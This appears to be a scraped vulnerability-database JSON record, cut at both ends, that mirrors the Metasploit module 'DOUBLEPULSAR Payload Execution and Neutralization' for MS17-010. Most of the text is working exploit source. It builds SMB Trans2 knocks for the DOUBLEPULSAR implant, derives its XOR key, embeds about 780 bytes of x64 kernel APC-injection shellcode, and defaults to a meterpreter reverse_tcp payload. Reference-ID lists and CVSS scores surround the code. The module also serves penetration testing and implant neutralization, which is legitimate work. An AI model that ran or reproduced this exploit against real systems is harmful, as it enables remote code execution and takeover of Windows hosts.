"PACKETSTORM:156196", "PACKETSTORM:142603", "PACKETSTORM:142602", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-27803", "1337DAY-ID-27786", "1337DAY-ID-29702", "1337DAY-ID-27802", "1337DAY-ID-27752"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:42031", "EDB-ID:47456", "EDB-ID:42030", "EDB-ID:43970", "EDB-ID:41987"]}, {"type": "nessus", "idList": ["700059.PRM", "MS17-010.NASL", "SMB_DOUBLE_PULSAR_BACKDOOR_DETECT.NBIN", "700099.PRM", "SMB_NT_MS17-010.NASL"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D"]}, {"type": "seebug", "idList": ["SSV:92964", "SSV:92952"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810698", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0145", "CVE-2017-0148", "CVE-2017-0146", "CVE-2017-0144", "CVE-2017-0143", "CVE-2017-0147"]}, {"type": "symantec", "idList": ["SMNTC-96705", "SMNTC-96706", "SMNTC-96709", "SMNTC-96703", "SMNTC-96707", "SMNTC-96704"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "threatpost", "idList": ["THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591"]}, {"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0144", "MS:CVE-2017-0148", "MS:CVE-2017-0143"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:64F70C2A6C3961CA44A77286E5B810CD"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34"]}, {"type": "avleonov", "idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2"]}], "modified": "2021-09-11T22:19:07", "rev": 2}, "score": {"value": 7.4, "vector": "NONE", "modified": "2021-09-11T22:19:07", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33313", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'DOUBLEPULSAR Payload Execution and Neutralization',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14',\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload', {}],\r\n ['Neutralize implant', {}]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n },\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_SAFE],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack('V').first\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n vprint_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n vprint_good(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n vprint_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n vprint_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << Rex::Text.rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack(\"S<\")\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" +\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" +\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" +\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" +\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" +\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" +\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" +\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" +\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" +\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" +\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" +\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" +\r\n \"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" +\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" +\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" +\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" +\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" +\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" +\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" +\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" +\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" +\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" +\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" +\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" +\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" +\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" +\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" +\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" +\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" +\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" +\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" +\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" +\r\n \"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" +\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" +\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" +\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" +\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" +\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" +\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" +\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" +\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" +\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" +\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" +\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" +\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" +\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" +\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" +\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-09-12] #"}, "lastseen": "2021-09-11T22:19:07", "differentElements": ["sourceData"], "edition": 14}, {"bulletin": {"id": "1337DAY-ID-33313", "vendorId": null, "hash": "597fc940e7a4d9e7b77e9d27d8f43f0d", "type": "zdt", "bulletinFamily": "exploit", "title": "DOUBLEPULSAR - Payload Execution and Neutralization Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2019-10-04T00:00:00", "modified": "2019-10-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33313", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0143", "CVE-2017-0148", "CVE-2017-0146", "CVE-2017-0145", "CVE-2017-0144", "CVE-2017-0147"], "immutableFields": [], "lastseen": "2021-09-12T22:15:25", "history": [], "viewCount": 93, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:146236", "PACKETSTORM:156196", "PACKETSTORM:142603", "PACKETSTORM:142602", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-27803", "1337DAY-ID-27786", "1337DAY-ID-29702", "1337DAY-ID-27802", "1337DAY-ID-27752"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:42031", "EDB-ID:47456", "EDB-ID:42030", "EDB-ID:43970", "EDB-ID:41987"]}, {"type": "nessus", "idList": ["700059.PRM", "MS17-010.NASL", "SMB_DOUBLE_PULSAR_BACKDOOR_DETECT.NBIN", "700099.PRM", "SMB_NT_MS17-010.NASL"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D"]}, {"type": "seebug", "idList": ["SSV:92964", "SSV:92952"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810698", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0145", "CVE-2017-0148", "CVE-2017-0146", "CVE-2017-0144", "CVE-2017-0143", "CVE-2017-0147"]}, {"type": "symantec", "idList": ["SMNTC-96705", "SMNTC-96706", "SMNTC-96709", "SMNTC-96703", "SMNTC-96707", "SMNTC-96704"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", 